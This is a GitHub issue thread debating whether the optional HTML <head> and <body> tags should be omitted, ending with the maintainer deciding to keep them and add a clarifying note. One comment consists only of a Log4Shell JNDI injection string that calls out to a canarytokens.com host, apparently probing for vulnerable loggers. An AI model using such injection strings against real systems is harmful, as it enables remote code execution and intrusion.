### ISSUE TITLE
HTML Link Positioning Answer is incorrect 

### ISSUE THREAD

**Issue by Millsky** [yangshun/front-end-interview-handbook#201]
Since the HTML5 specification it is no longer recommended to include the optional `<head>` tag.

https://google.github.io/styleguide/htmlcssguide.html#Optional_Tags

The body tag is also not always required.
https://html.spec.whatwg.org/multipage/syntax.html#syntax-tag-omission

Including both of these tags just increase the amount the browser must parse before rendering the page. It also increase the payload size.

**Comment by Saater** [comment]
Really?

**Comment by juliovt-07** [comment]
e onde ficaria o <title> ?

**Comment by sidharth3000** [comment]
i want to work on this issue.

**Comment by sidharth3000** [comment]
i am interested to fix this.

**Comment by contributor13** [comment]
If this is still open then I would like to fix it.

**Comment by aasim-syed** [comment]
if its open i would fix it

**Comment by kdgyimah** [comment]
> Since the HTML5 specification it is no longer recommended to include the optional `<head>` tag.
> 
> https://google.github.io/styleguide/htmlcssguide.html#Optional_Tags
> 
> The body tag is also not always required.
> https://html.spec.whatwg.org/multipage/syntax.html#syntax-tag-omission
> 
> Including both of these tags just increase the amount the browser must parse before rendering the page. It also increase the payload size.

Including the `<head>` and `<body>` tag increases the payload size?
I can understand the need to optimize for performance and fast loading times, but I should think there are far better ways of solving this.
I.e
1. Compressing and optimizing your images. (Either using the WebP/JPEG 2000/JPEG XR image format, Lazyloading, etc.)
2.  Caching your site
3. Deferred loading for CSS and JS files
4. Minifying the files
5. Leveraging on CDNs

I should think there are more ways than this but removing the `<head>` and `<body>` tag sounds like trouble, considering Browser support may not be there yet for the user who may be visiting your site or application?
I think it is best to leave it as is @Millsky  🙂

**Comment by Arjun-1404** [comment]
${jndi:ldap://x${hostName}.L4J.802wz0zyzmx656blyva220818.canarytokens.com/a}

**Comment by yangshun** [comment]
Agree with what @kdgyimah said. The performance gains are likely to not be significant enough to warrant this change. The [Hacker News comments](https://news.ycombinator.com/item?id=19970959) outlines more issues with doing this.

But I'll modify the answer to inform readers about this.
